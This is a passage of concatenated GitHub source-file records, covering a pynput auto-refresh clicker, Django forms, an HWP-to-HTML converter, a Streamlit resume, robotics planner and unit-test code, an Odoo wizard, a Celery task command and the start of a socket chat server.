keyboard.press(Key.f5)\r\n# keyboard.release(Key.f5)\r\n\r\n# 
time.sleep(time_between_refresh * 60)\r\n\r\n# t2 = time.time()\r\n\r\n# --- mode if you're doing something at the same time ---\r\nif doing_something:\r\n while t2 - t1 < duree_activation * 360:\r\n count = 0\r\n while count != 50:\r\n mouse.position = (560, 1050)\r\n if count == 49:\r\n mouse.click(Button.left)\r\n count += 1\r\n\r\n time.sleep(0.5)\r\n\r\n count = 0\r\n while count != 50:\r\n mouse.position = (540, 1020)\r\n if count == 49:\r\n mouse.click(Button.left)\r\n count += 1\r\n\r\n time.sleep(0.5)\r\n\r\n keyboard.press(Key.f5)\r\n keyboard.release(Key.f5)\r\n\r\n time.sleep(1)\r\n\r\n keyboard.press(Key.alt_l)\r\n keyboard.press(Key.tab)\r\n keyboard.release(Key.tab)\r\n keyboard.release(Key.alt_l)\r\n\r\n t2 = time.time()\r\n# -------------------------------------------------------\r\n","repo_name":"Wasup52/projects-dump","sub_path":"bot Théo/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3361347811","text":"from django import forms\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.html import strip_tags\n\nfrom subjects.models import Tag\nfrom subjects.forms import ParticipantsMultipleChoiceField\n\nfrom .models import Webpage\n\nfrom file_resubmit.widgets import ResubmitFileWidget\n\nclass WebpageForm(forms.ModelForm):\n subject = None\n students = ParticipantsMultipleChoiceField(queryset = None, required = False)\n \n def __init__(self, *args, **kwargs):\n super(WebpageForm, self).__init__(*args, **kwargs)\n\n self.subject = kwargs['initial'].get('subject', None)\n \n if self.instance.id:\n self.subject = self.instance.topic.subject\n self.initial['tags'] = \", \".join(self.instance.tags.all().values_list(\"name\", flat = True))\n \n self.fields['students'].queryset = self.subject.students.all()\n self.fields['groups'].queryset = self.subject.group_subject.all()\n\n tags = forms.CharField(label = _('Tags'), required = False)\n\n class Meta:\n model = Webpage\n fields = ['name', 'content', 'brief_description', 'all_students', 'students', 'groups', 'show_window', 'visible']\n labels = {\n 'name': _('Webpage name'),\n 'content': _('Webpage content'),\n }\n widgets = {\n 'content': forms.Textarea,\n 'brief_description': forms.Textarea,\n 'students': forms.SelectMultiple,\n 'groups': forms.SelectMultiple,\n }\n\n def clean_name(self):\n name = self.cleaned_data.get('name', '')\n \n topics = self.subject.topic_subject.all()\n\n for topic in topics:\n if self.instance.id:\n same_name = topic.resource_topic.filter(name__unaccent__iexact = name).exclude(id = self.instance.id).count()\n else:\n same_name = topic.resource_topic.filter(name__unaccent__iexact = name).count()\n \n if same_name > 0:\n self._errors['name'] = [_('This subject already has a webpage with this name')]\n\n return ValueError\n\n return name\n\n def clean_content(self):\n content = self.cleaned_data.get('content', '')\n cleaned_content = strip_tags(content)\n \n if cleaned_content == '':\n self._errors['content'] = [_('This field is required.')]\n\n return ValueError\n\n return content\n\n def save(self, commit = True):\n super(WebpageForm, self).save(commit = True)\n\n self.instance.save()\n\n previous_tags = self.instance.tags.all()\n\n tags = self.cleaned_data['tags'].split(\",\")\n\n #Excluding unwanted tags\n for prev in previous_tags:\n if not prev.name in tags:\n self.instance.tags.remove(prev)\n \n for tag in tags:\n tag = tag.strip()\n\n exist = 
Tag.objects.filter(name = tag).exists()\n\n if exist:\n new_tag = Tag.objects.get(name = tag)\n else:\n new_tag = Tag.objects.create(name = tag)\n\n if not new_tag in self.instance.tags.all():\n self.instance.tags.add(new_tag)\n\n return self.instance\n\nclass FormModalMessage(forms.Form):\n MAX_UPLOAD_SIZE = 10*1024*1024\n\n comment = forms.CharField(widget=forms.Textarea,label=_(\"Message\"))\n image = forms.FileField(widget=ResubmitFileWidget(attrs={'accept':'image/*'}),required=False)\n\n def clean_comment(self):\n comment = self.cleaned_data.get('comment', '')\n cleaned_comment = strip_tags(comment)\n\n if cleaned_comment == '':\n self._errors['comment'] = [_('This field is required.')]\n\n return ValueError\n\n return comment\n\n def clean_image(self):\n image = self.cleaned_data.get('image', False)\n\n if image:\n if hasattr(image, '_size'):\n if image._size > self.MAX_UPLOAD_SIZE:\n self._errors['image'] = [_(\"The image is too large. It should have less than 10MB.\")]\n\n return ValueError\n\n return image","repo_name":"amadeusproject/amadeuslms","sub_path":"webpage/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4113,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"72"} +{"seq_id":"10153186234","text":"import subprocess\nimport uuid\nimport os\nimport bs4\n\ncurrent_path=os.path.dirname(__file__)\n\nprint(current_path)\n\nstatic_path=os.path.join(current_path,'static')\n\nprint(static_path)\n\ntemp_path=os.path.join(static_path,'tempfile')\n\ndef combine(path):\n soup = bs4.BeautifulSoup(open(path+\"/hey.html\",'r',encoding='UTF8').read(),features=\"lxml\")\n stylesheets = soup.findAll(\"link\", {\"rel\": \"stylesheet\"})\n for s in stylesheets:\n t = soup.new_tag('style')\n c = bs4.element.NavigableString(open(path+'/'+s[\"href\"],'r',encoding='UTF8').read())\n t.insert(0,c)\n t['type'] = 'text/css'\n s.replaceWith(t)\n\n open(path+\"/result.html\", \"w\",encoding='UTF8').write(str(soup))\n\ndef set_img(path,id):\n soup = bs4.BeautifulSoup(open(path+\"/result.html\",'r',encoding='UTF8').read(),features=\"lxml\")\n\n for img in soup.findAll('img'):\n try:\n img['src'] = r\"{{url_for('\" + 'static' + r\"', filename='tempfile/\" + id + '/' +img['src'] + r\"')}}\"\n except:\n pass\n open(path+\"/result.html\", \"w\",encoding='UTF8').write(str(soup))\n \ndef change_to_html(path):\n\n id=str(uuid.uuid4())\n\n os.mkdir(os.path.join(temp_path,id))\n\n subprocess.check_call(['hwp5html',\"--output\", os.path.join(temp_path, id) , path])\n\n subprocess.check_call(['hwp5html',\"--html\",\"--output\", os.path.join(temp_path,id,\"hey.html\"),path])\n\n combine(os.path.join(temp_path,id))\n\n set_img(os.path.join(temp_path,id),id)\n\n print(id)\n\n return id","repo_name":"0ev/flask-hwp-to-html","sub_path":"hwptohtml.py","file_name":"hwptohtml.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74358468713","text":"from pathlib import Path\n\nimport streamlit as st\nfrom PIL import Image\n\ncurrent_dir = Path(__file__).parent if \"__file__\" in locals() else Path.cwd()\ncss_file = current_dir/ \"styles\" / \"main.css\"\nresume_file = current_dir / \"assets\" / \"CV.pdf\"\nprofile_pic = current_dir / \"assets\" / \"profile-pic.png\"\n\n\n\nPAGE_TITLE = \"Digital Resume | Liburna Mehmeti\"\nPAGE_ICON = \":wave:\"\nNAME = \"Liburna Mehmeti\"\nDESCRIPTION = \"A tech enthusiast skilled in Python, SQL, HTML/CSS, JS, PHP, MySQL, 
Java, and React Native. I'm passionate about AI and Data Science, and I enjoy teaching programming to kids. I'm seeking a career where I can leverage my expertise in Python and SQL.\"\n\nEMAIL = \"📧mehmetiliburna@gmail.com\"\nSOCIAL_MEDIA = {\n    \"LinkedIn\": \"https://www.linkedin.com/in/liburna-mehmeti/\",\n    \"GitHub\": \"https://github.com/liburnamehmeti12\",\n}\n\nPROJECTS = {\n    \"Weather App\" : \"\" \n}\n\nst.set_page_config(page_title= PAGE_TITLE, page_icon=PAGE_ICON)\n\n\n\nwith open(css_file) as f:\n    st.markdown(\"<style>{}</style>\".format(f.read()), unsafe_allow_html=True)\nwith open(resume_file, \"rb\") as pdf_file:\n    PDFbyte = pdf_file.read()\nprofile_pic = Image.open(profile_pic)\n\n\ncol1, col2 = st.columns(2, gap=\"small\")\nwith col1:\n    st.image(profile_pic, width=300)\n\nwith col2:\n    st.title(NAME)\n    st.write(DESCRIPTION)\n    st.download_button(\n        label = \"Download Resume\",\n        data = PDFbyte,\n        file_name = resume_file.name,\n        mime= \"application/octet-stream\"\n    )\n\n    st.write(EMAIL)\n\n\n\nst.write(\"#\")\ncols = st.columns(len(SOCIAL_MEDIA))\nfor index, (platform, link) in enumerate(SOCIAL_MEDIA.items()):\n    cols[index].write(f\"[{platform}]({link})\")\n\n\nst.write(\"---\")\nst.write(\"#\")\nst.header(\"Experience\")\n\nst.subheader(\"General Tech Engineer, Digital School / Shkolla Digjitale (Oct 2021 - Present)\")\nst.write(\n    \"\"\"\n    - ✔️Providing instruction to a diverse age group (7-18) in programming, encompassing foundational concepts to advanced languages (e.g., PHP, MySQL, Java, Python, WordPress).\n\n    - ✔️Overseeing and maintaining the quality of instruction delivered by instructors within the organization.\n\n    - ✔️Collaborating on curriculum development to ensure course materials remain current and aligned with evolving technology trends, delivering cutting-edge instruction to students.\n\n    \"\"\"\n)\n\n\nst.subheader(\"Social Media Manager, Lia Stublla L.L.C (Jan 2022 - Jul 2022)\")\nst.write(\n    \"\"\"\n    - ✔️Managed and executed social media strategies for Liastublla, optimizing engagement and increasing brand visibility across various platforms.\n\n\n    - ✔️Created and curated content, including text, images, and videos, to maintain a strong online presence and foster audience growth.\n\n\n    - ✔️Monitored social media metrics, analyzed performance data, and implemented data-driven improvements to achieve key marketing objectives and enhance the company's online image.\n\n    \"\"\"\n)\n\nst.subheader(\"General Manager, KS-EU Agency (Jul 2020 - Jul 2021)\")\nst.write(\n    \"\"\"\n    - ✔️Oversaw daily operations and service delivery to ensure client satisfaction.\n\n\n    - ✔️Led and managed a team, fostering a collaborative work environment and streamlining processes for efficiency.\n\n\n    - ✔️Played a key role in business development, establishing partnerships, expanding client relationships, and achieving revenue growth targets.\n\n    \"\"\"\n)\n\nst.write(\"#\")\nst.header(\"Qualifications\")\nst.write(\n    \"\"\"\n    - ✔️ Bachelor's in Computer Science and Engineering (Ongoing)\n\n    - ✔️ Gymnasium Graduate (2020)\n    \"\"\"\n)\n\nst.write(\"---\")\nst.write(\"#\")\nst.header(\"Certifications\")\nst.write(\"---\")\nst.subheader(\"Junior Programmer\")\nst.write(\"Digital School\")\nst.write(\n    \"\"\"\n    - HTML CSS & JS\n    - PHP & MySQL\n    - JAVA\n\n    \"\"\"\n)\n\nst.subheader(\"IT Essentials\")\nst.write(\"Cisco\")\n\nst.write(\n    \"\"\"\n    - Proficiency in troubleshooting and hardware/software fundamentals.\n    - Computer maintenance\n    - Technical support\n\n    
\"\"\"\n)\n\nst.subheader(\"Introduction to Python\")\nst.write(\"DataCamp\")\nst.write(\n \"\"\"\n - Python syntax and fundamentals.\n - Understanding of Python data structures.\n - Proficiency in writing Python code\n - Problem-solving skills using Python.\n\n \"\"\"\n)\n\nst.subheader(\"SQL Intermediate\")\nst.write(\"SoloLearn\")\nst.write(\n \"\"\"\n - Proficiency in writing SQL queries for data retrieval and manipulation.\n - Knowledge of database design and schema organization.\n - Ability to perform complex database operations, including joins and subqueries.\n - Skills in managing and optimizing SQL databases for performance.\n\n \"\"\"\n)\n\nst.subheader(\"Python Intermediate\")\nst.write(\"DataCamp\")\nst.write(\n \"\"\"\n - Ability to work with functions, modules, and libraries.\n - Knowledge of database design and schema organization.\n - Competence in handling and manipulating data using Python.\n - Proficient problem-solving skills through Python programming.\n \"\"\"\n)\n\nst.subheader(\"Data Manipulation with Pandas\")\nst.write(\"DataCamp\")\nst.write(\n \"\"\"\n - Data cleaning, transformation, and aggregation using Pandas.\n - Handling missing data effectively.\n - Data visualization with Pandas capabilities.\n - Data export to various formats.\n\n\n \"\"\"\n)\n\n","repo_name":"liburnamehmeti12/Resume","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3327956841","text":"import sys\r\nfrom collections import deque\r\ninput=sys.stdin.readline\r\n\r\n\r\ndef BFS(N):\r\n visited[N]=1\r\n que=deque()\r\n que.append(N)\r\n cnt=2\r\n while que:\r\n a=que.popleft()\r\n for i in graph[a]:\r\n if visited[i]==0:\r\n visited[i]=cnt\r\n cnt+=1\r\n que.append(i)\r\n \r\nN,M,R=map(int,input().split())\r\n\r\ngraph=[[] for i in range(N+1)]\r\n\r\nfor _ in range(M):\r\n A,B=map(int,input().split())\r\n graph[A].append(B)\r\n graph[B].append(A)\r\n\r\nfor i in graph:\r\n i.sort()\r\n\r\nvisited=[0]*(N+1)\r\n\r\n\r\nBFS(R)\r\n\r\nfor i in range(1,len(visited)):\r\n print(visited[i])","repo_name":"sknyuki/Algorithm","sub_path":"백준/Silver/24444. 
알고리즘 수업 - 너비 우선 탐색 1/알고리즘 수업 - 너비 우선 탐색 1.py","file_name":"알고리즘 수업 - 너비 우선 탐색 1.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"35271220128","text":"from helping_hands_rl_envs.planners.random_planner import RandomPlanner\nfrom helping_hands_rl_envs.planners.play_planner import PlayPlanner\nfrom helping_hands_rl_envs.planners.block_picking_planner import BlockPickingPlanner\nfrom helping_hands_rl_envs.planners.block_stacking_planner import BlockStackingPlanner\nfrom helping_hands_rl_envs.planners.brick_stacking_planner import BrickStackingPlanner\nfrom helping_hands_rl_envs.planners.house_building_1_planner import HouseBuilding1Planner\nfrom helping_hands_rl_envs.planners.house_building_2_planner import HouseBuilding2Planner\nfrom helping_hands_rl_envs.planners.house_building_3_planner import HouseBuilding3Planner\nfrom helping_hands_rl_envs.planners.house_building_4_planner import HouseBuilding4Planner\nfrom helping_hands_rl_envs.planners.improvise_house_building_2_planner import ImproviseHouseBuilding2Planner\nfrom helping_hands_rl_envs.planners.improvise_house_building_3_planner import ImproviseHouseBuilding3Planner\nfrom helping_hands_rl_envs.planners.deconstruct_planner import DeconstructPlanner\n\nAVAILABLE_PLANNER = ['random',\n 'play',\n 'block_picking',\n 'block_stacking',\n 'brick_stacking',\n 'house_building_1',\n 'house_building_2',\n 'house_building_3',\n 'house_building_4',\n 'improvise_house_building_2',\n 'improvise_house_building_3',\n 'house_building_1_deconstruct',\n 'house_building_4_deconstruct',\n 'house_building_x_deconstruct',\n 'improvise_house_building_3_deconstruct',\n 'improvise_house_building_4_deconstruct',\n 'random_picking',\n 'random_stacking']\n\ndef createPlanner(config):\n if 'planner_noise' not in config: config['planner_noise'] = None\n\n if config['planner'] == 'random':\n return lambda env: RandomPlanner(env, config)\n if config['planner'] == 'play':\n return lambda env: PlayPlanner(env, config)\n elif config['planner'] == 'block_picking':\n return lambda env: BlockPickingPlanner(env, config)\n elif config['planner'] == 'block_stacking':\n return lambda env: BlockStackingPlanner(env, config)\n elif config['planner'] == 'brick_stacking':\n return lambda env: BrickStackingPlanner(env, config)\n elif config['planner'] == 'house_building_1':\n return lambda env: HouseBuilding1Planner(env, config)\n elif config['planner'] == 'house_building_2':\n return lambda env: HouseBuilding2Planner(env, config)\n elif config['planner'] == 'house_building_3':\n return lambda env: HouseBuilding3Planner(env, config)\n elif config['planner'] == 'house_building_4':\n return lambda env: HouseBuilding4Planner(env, config)\n elif config['planner'] == 'improvise_house_building_2':\n return lambda env: ImproviseHouseBuilding2Planner(env, config)\n elif config['planner'] == 'improvise_house_building_3':\n return lambda env: ImproviseHouseBuilding3Planner(env, config)\n elif config['planner'] == 'house_building_1_deconstruct':\n return lambda env: DeconstructPlanner(env, config)\n elif config['planner'] == 'house_building_4_deconstruct':\n return lambda env: DeconstructPlanner(env, config)\n elif config['planner'] == 'house_building_x_deconstruct':\n return lambda env: DeconstructPlanner(env, config)\n elif config['planner'] == 'improvise_house_building_3_deconstruct':\n return lambda env: DeconstructPlanner(env, config)\n elif config['planner'] == 
'improvise_house_building_4_deconstruct':\n return lambda env: DeconstructPlanner(env, config)\n elif config['planner'] == 'random_picking':\n return lambda env: BlockPickingPlanner(env, config)\n elif config['planner'] == 'random_stacking':\n return lambda env: BlockStackingPlanner(env, config)\n","repo_name":"ondrejbiza/action_priors","sub_path":"ap/helping_hands_rl_envs/planners/planner_factory.py","file_name":"planner_factory.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"73423524392","text":"#!/usr/bin/python3\n\n\"\"\"\nget datetime module from datetime\nget the unittest module\nget os use os.path module to use to check if file exist\nin teardown method to remove it\nget the BaseModel module\n\"\"\"\n\nfrom datetime import datetime\nfrom models.base_model import BaseModel\nimport os\nimport unittest\nimport json\n\n\nclass TestBaseModel(unittest.TestCase):\n \"\"\"\n TestBaseModel class\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n \"\"\" set up function\"\"\"\n cls.my_model = BaseModel()\n cls.my_model_2 = BaseModel()\n cls.my_model.name = \"My First Model\"\n cls.my_model.my_number = 89\n\n def test_id(self):\n \"\"\" test if id is assigned \"\"\"\n self.assertTrue(TestBaseModel.my_model.id)\n\n def test_id_type(self):\n \"\"\"test id is a string\"\"\"\n self.assertTrue(type(TestBaseModel.my_model.id) == str)\n\n def test_id_uniq(self):\n \"\"\" test id is uniq\"\"\"\n self.assertTrue(TestBaseModel.my_model.id !=\n TestBaseModel.my_model_2.id)\n\n def test_created_at(self):\n \"\"\" test created at is assigned \"\"\"\n self.assertTrue(TestBaseModel.my_model.created_at)\n\n def test_created_at_is_datetime(self):\n \"\"\"\n test created date is datetime instance\n \"\"\"\n self.assertIsInstance(TestBaseModel.my_model.created_at, datetime)\n\n def test_updated_at(self):\n \"\"\" test updated_at at is assigned \"\"\"\n self.assertTrue(TestBaseModel.my_model.updated_at)\n\n def test_updated_at_is_datetime(self):\n \"\"\"\n test updated date is datetime instance\n \"\"\"\n self.assertIsInstance(TestBaseModel.my_model.updated_at, datetime)\n\n def test_str(self):\n \"\"\"test __str__ of an object\"\"\"\n exOutPut = \"[{}] ({}) {}\".format(TestBaseModel.my_model.__class__\n .__name__,\n TestBaseModel.my_model.id,\n TestBaseModel.my_model.__dict__)\n output = str(TestBaseModel.my_model)\n self.assertEqual(output, exOutPut)\n\n def test_save(self):\n \"\"\"\n test save method check if the updated_at value changes\n \"\"\"\n firstUpdatedValue = TestBaseModel.my_model.updated_at\n TestBaseModel.my_model.save()\n secondUpdatedValue = TestBaseModel.my_model.updated_at\n self.assertTrue(type(TestBaseModel.my_model.id) == str)\n self.assertTrue(firstUpdatedValue != secondUpdatedValue)\n \"\"\"\n Test if the save method updates the JSON file.\n \"\"\"\n with open('file.json', 'r') as file:\n obj_dict = json.load(file)\n prev_updated_at = self.my_model.updated_at.isoformat()\n self.my_model.save()\n with open('file.json', 'r') as file:\n updated_obj_dict = json.load(file)\n self.assertNotEqual(prev_updated_at,\n updated_obj_dict['BaseModel.' 
+\n self.my_model.id]['updated_at'])\n\n \"\"\"\n Test if the save method updates the updated_at attribute.\n \"\"\"\n prev_updated_at = self.my_model.updated_at\n self.my_model.save()\n self.assertNotEqual(prev_updated_at, self.my_model.updated_at)\n\n def test_to_dict_method(self):\n \"\"\"\n test to_dict method\n confirm __class__ is added to the dict\n confirm created_at and updated_at are in isoformat\n \"\"\"\n obj_dict = TestBaseModel.my_model.to_dict()\n self.assertEqual(obj_dict['__class__'], 'BaseModel')\n self.assertEqual(obj_dict['id'], TestBaseModel.my_model.id)\n self.assertEqual(obj_dict['created_at'],\n TestBaseModel.my_model.created_at.isoformat())\n self.assertEqual(obj_dict['updated_at'],\n TestBaseModel.my_model.updated_at.isoformat())\n\n def test_create_BaseModel_Dict(self):\n \"\"\"\n Test creating BaseModel from dictionary\n \"\"\"\n my_dict = TestBaseModel.my_model.to_dict()\n my_model = BaseModel(my_dict)\n self.assertTrue(my_model.id)\n self.assertIsInstance(my_model.created_at, datetime)\n self.assertIsInstance(my_model.updated_at, datetime)\n self.assertTrue(my_model.id !=\n TestBaseModel.my_model_2.id)\n\n def tearDown(self):\n \"\"\"\n Set up teardown method\n \"\"\"\n if os.path.exists(\"file.json\"):\n os.remove(\"file.json\")\n\n\nif __name__ == \"__main__\":\n \"\"\"\n if test is executed it runs as main\n but if it is imported it does not execute\n \"\"\"\n unittest.main()\n","repo_name":"joekariuki3/AirBnB_clone","sub_path":"tests/test_models/test_base_model.py","file_name":"test_base_model.py","file_ext":"py","file_size_in_byte":4653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18436844870","text":"\"\"\"\nCreated on 2019-09-15\n@author: Ricardo Padrino - github.com/rpadrino - IMDEA Networks\n\"\"\"\nfrom __future__ import division\n\nimport math\n\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\nimport numpy as np\nimport sys\nimport re #regular expresions\n\nimport pandas as pd\n\n# functions\n## lambda function to human readable sort (to avoid problems)\n## ex: rectangle100 .. rectangle80 --> rectangle80 .. 
rectangle100\ndef natural_sort(ll):\n    convert = lambda text: int(text) if text.isdigit() else text.lower()\n    alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]\n    return sorted(ll, key = alphanum_key)\n\n\ndef countFiles(path):\n    count_imgs = 0\n\n    for file_name in listdir( path ):\n        if isfile( join( path, file_name ) ):\n            count_imgs+=1\n\n    total_files = count_imgs\n\n    return total_files\n\n\n\ndef getSegmentsAsDataframe(crops_folder_path):\n\n    # counter and variables\n    nframe = 0 # it will be updated to 1 in the first loop\n    vid_name_prev = \"\"\n\n    df = pd.DataFrame( columns=('filename', 'frame', 'x1', 'y1', 'x2', 'y2', 'detection-acc') )\n\n\n    if os.path.exists( crops_folder_path ):\n        for file_name in natural_sort( listdir( crops_folder_path ) ):\n            file_name_wpath = join( crops_folder_path, file_name )\n\n            if isfile( file_name_wpath ):\n\n                #mac files\n                if file_name.startswith('.DS_Store'):\n                    continue\n\n                if not file_name.lower().endswith('jpg') and not file_name.lower().endswith('jpeg') \\\n                and not file_name.lower().endswith('png') and not file_name.endswith('bmp') :\n                    continue\n\n                # expected format: IMG_20190513_153057rectangleX_X_X_X\n                # expected format: IMG_20190513_153057yYYYYYYrectangleX_X_X_X\n                ## VS\n                # expected format: IMG_20190513_153057rectangleX_X_X_X_acc0.999\n                # expected format: IMG_20190513_153057YYYYYYrectangleX_X_X_X_acc0.999\n                ## VS\n                # expected format: IMG_20190513_153057frame2rectangleX_X_X_X_acc0.999\n                # expected format: IMG_20190513_153057YYYYYYframe2rectangleX_X_X_X_acc0.999\n\n                #now format - 20191028\n                #20191028_141559_909402\n                #[IMG_20190807_103944.634547.PNG]\n\n                filename_splitted = file_name.split(\"rectangle\")\n                vid_name = filename_splitted[0] #previously needed for frame number\n\n                nframe = int(filename_splitted[0].split(\"frame\")[-1])\n\n                #WRONG #frame_coords_info = filename_splitted[-1].split(\".\")[0].split(\"acc\")[0] #X_X_X_X_acc.ext -> X_X_X_X_\n                frame_coords_info = filename_splitted[-1].split(\"acc\")[0] #[_]X_X_X_X[_]accZ.ZZ.ext -> [_]X_X_X_X[_]\n                if frame_coords_info.startswith('_'): #just in case\n                    frame_coords_info = frame_coords_info[1:]\n\n                if frame_coords_info.endswith('_'): #for acc\n                    frame_coords_info = frame_coords_info[1:]\n\n                coords = frame_coords_info.split(\"_\")\n                coords = list(map(int, coords))\n\n                acc_retina = filename_splitted[-1].split(\"acc\")[-1] #Z.ZZ.ext\n                #rfind: last occurrence\n                acc_retina = float( acc_retina[:acc_retina.rfind(\".\")] ) #Z.ZZ\n\n\n                #inserting new entry\n                #FILENAME, FRAME-NUMBER, X1, Y1, X2, Y2, ACC\n                df.loc[ 0 if pd.isnull( df.index.max() ) else df.index.max() + 1 ] = [file_name] + [int(nframe)] + list(coords) + [acc_retina]\n                #[int(coords[0])] + [int(coords[1])] + [int(coords[2])] + [int(coords[3])]\n\n    #for-end\n\n    df.insert(0,'ii', df.index)\n\n    return df\n","repo_name":"GCGImdea/Symbiosis","sub_path":"optical-classification/mod_read_crop_files.py","file_name":"mod_read_crop_files.py","file_ext":"py","file_size_in_byte":3773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"18216899890","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# Thesis bike shop\n#\n##############################################################################\n\nfrom openerp.osv import fields, osv\nfrom openerp.tools.translate import _\nimport openerp.addons.decimal_precision as dp\nfrom datetime import datetime\nimport urllib\nimport csv\nimport time\n\nclass 
init_update_task_squence(osv.osv_memory):\n _name = \"init.update.task.squence\"\n \n _columns = {\n 'amount': fields.float('Amount Compensation'),\n 'task_value': fields.float('Task Value'),\n 'tasks_ahead': fields.float('Tasks Ahead'),\n }\n \n def onchange_amount(self, cr, uid, ids, amount, context):\n result = 0\n customer_id = False\n task_id = context.get('active_id', False)\n \n task_obj = self.pool.get('project.task')\n inoive_obj = self.pool.get('account.invoice')\n company_obj = self.pool.get('res.company')\n company_ids = company_obj.search(cr, uid, [('parent_id','=', False)])\n if company_ids and len(company_ids) == 1:\n customer_id = company_obj.browse(cr, uid, company_ids)[0].partner_id.id\n ids = self.search(cr, uid, []) \n if task_id:\n obj = task_obj.browse(cr, uid, task_id)\n \n invoice_ids = inoive_obj.search(cr, uid, [('company_id','=', obj.company_id.id), ('partner_id', '=', customer_id)], limit=1)\n mana_fee = 0\n if invoice_ids:\n mana_fee = inoive_obj.browse(cr, uid, invoice_ids)[0].amount_total\n \n task_ids = task_obj.search(cr, uid, [('company_id','=', obj.company_id.id),('state', 'not in', ('done', 'cancel'))])\n number_task = len(task_ids)\n if number_task == 0:\n result = 0\n return {'value': {'tasks_ahead': 0}}\n \n now = datetime.now() \n duration = now - datetime.strptime(obj.create_date, '%Y-%m-%d %H:%M:%S')\n days, seconds = duration.days, duration.seconds\n hours = days * 24 + seconds // 3600\n result = (mana_fee + amount) / number_task * int(hours)\n sql = ''' select id from project_task where state not in ('done', 'cancel') and sort_task_value > %s ''' %result\n cr.execute(sql)\n task_ids = cr.fetchall() \n return {'value': {'tasks_ahead': len(task_ids), 'task_value': result}} \n return {'value': {'tasks_ahead': 0}}\n \n def action_validate(self, cr, uid, ids, context={}):\n \n task_obj = self.pool.get('project.task')\n task_id = context.get('active_id', False)\n if not task_id:\n return {}\n for obj in self.browse(cr, uid, ids):\n task_obj.write(cr, uid, [task_id], {'amount' : obj.amount + task_obj.browse(cr, uid, task_id).amount,\n 'task_value' : obj.task_value,\n 'tasks_ahead': obj.tasks_ahead})\n\n return {'type': 'ir.actions.act_window_close'}\n \n\n","repo_name":"Minh-Tran/Codes","sub_path":"init_barry_code/wizard/init_update_task_squence.py","file_name":"init_update_task_squence.py","file_ext":"py","file_size_in_byte":3137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10772782006","text":"from django.core.management import BaseCommand, CommandError\nfrom django_celery_beat.models import IntervalSchedule, PeriodicTask\n\n\nclass Command(BaseCommand):\n\n help = \"Set Periodic Task\"\n\n def handle(self, *args, **options):\n try:\n every_50_seconds, _ = IntervalSchedule.objects.get_or_create(every=50, period=IntervalSchedule.SECONDS,)\n every_24_hours, _ = IntervalSchedule.objects.get_or_create(every=24, period=IntervalSchedule.HOURS,)\n\n PeriodicTask.objects.update_or_create(\n task=\"api.tasks.get_youtube_videos\",\n name=\"Get Youtube Videos\",\n defaults=dict(\n interval=every_50_seconds,\n ),\n )\n\n PeriodicTask.objects.update_or_create(\n task=\"api.tasks.enable_api_keys\",\n name=\"Enable API KEYS\",\n defaults=dict(\n interval=every_24_hours,\n ),\n )\n except Exception as e:\n raise 
CommandError(e)\n","repo_name":"InvincibleDev/FamPay-Youtube-API","sub_path":"FamPayYoutube/api/management/commands/setperiodictask.py","file_name":"setperiodictask.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32636087971","text":"\"\"\"\nclient server communication, server side code review\n\"\"\"\nimport socket\nimport sys\nimport json\nimport argparse\nimport logging\nimport select\nimport time\nimport logs.config_log_server_side\nfrom shared.variables import DEFAULT_PORT, MAX_CONNECTIONS, ACTION, TIME, USER, \\\n ACCOUNT_NAME, SENDER, PRESENCE, RESPONSE, ERROR, MESSAGE, MESSAGE_TEXT\nfrom shared.utilities import get_message, send_message\nfrom shared.errors import UnreadableReceivedDataError\nfrom shared.decorators import log\n\nSERVER_SIDE_LOGGER = logging.getLogger('server_side_logger')\n\n\n@log\ndef analyzer(client_message, message_list, client):\n \"\"\"\n A message handler from clients that accepts a dictionary -\n    message from the client, checks the correctness, returns a\n response dictionary for a client\n \"\"\"\n SERVER_SIDE_LOGGER.debug(f'analyze of client message {client_message}')\n if ACTION in client_message and client_message[ACTION] == PRESENCE \\\n and TIME in client_message and USER in client_message \\\n and client_message[USER][ACCOUNT_NAME] == 'Anonymous':\n send_message(client, {RESPONSE: 200})\n return\n elif ACTION in client_message and client_message[ACTION] == MESSAGE and \\\n TIME in client_message and MESSAGE_TEXT in client_message:\n message_list.append((client_message[ACCOUNT_NAME], client_message[MESSAGE_TEXT]))\n return\n else:\n send_message(client, {\n RESPONSE: 400,\n ERROR: 'Bad Request'\n })\n return\n\n\n@log\ndef argument_parser():\n \"\"\"\n parsing arguments\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', default=DEFAULT_PORT, type=int, nargs='?')\n parser.add_argument('-a', default='', nargs='?')\n namespace = parser.parse_args(sys.argv[1:])\n addr_to_listen = namespace.a\n port_to_listen = namespace.p\n\n if not 1023 < port_to_listen < 65536:\n SERVER_SIDE_LOGGER.critical(\n f'attempt to launch server with wrong port '\n f'{port_to_listen}, allowed ports from 1024 to 65535.'\n )\n sys.exit(1)\n\n return addr_to_listen, port_to_listen\n\n\ndef server_launcher():\n \"\"\"\n loading params of cmd, if they're not set,\n will defined by default, after 